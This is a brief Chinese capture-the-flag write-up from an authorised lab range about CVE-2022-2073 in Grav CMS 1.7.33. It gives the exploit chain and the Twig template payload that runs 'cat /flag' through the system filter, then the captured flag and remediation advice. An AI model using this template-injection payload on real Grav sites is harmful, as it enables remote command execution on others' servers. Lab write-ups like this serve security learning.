环境:春秋云境“免费空间”授权实验靶场。历史实例已关闭。
1. 基本信息
| 项目 | 内容 |
|---|---|
| CVE | CVE-2022-2073 |
| 产品 | Grav CMS 1.7.33 |
| 利用链 | 注册首个管理员 -> 编辑 Home 页面 -> Twig filter("system") |
| 命令 | cat /flag |
| Flag | flag{80063410-3da9-4f8f-a351-c1ba153cc485} |
2. 原理与复现
初始化状态下可注册首个管理员。后台页面编辑器允许 Twig 模板使用危险 system 过滤器,攻击者将命令作为模板表达式执行。
登录后台后编辑 Home 页面,加入等价模板表达式:
{{ 'cat /flag'|filter("system") }}
保存并访问 Home 页面:
注册管理员 -> 后台编辑 Home -> 保存 Twig -> GET / -> 执行命令 -> 回显 Flag
响应得到:
flag{80063410-3da9-4f8f-a351-c1ba153cc485}
3. 修复建议与验证
升级 Grav,禁用模板中的系统调用和危险过滤器;编辑权限最小化,模板与内容分离,进程使用低权限。Flag 与平台记录一致,已提交并关闭靶场。原始注册/后台路径和响应未保存,截图已保存到 images 目录并由平台详情页复核。
截图证据

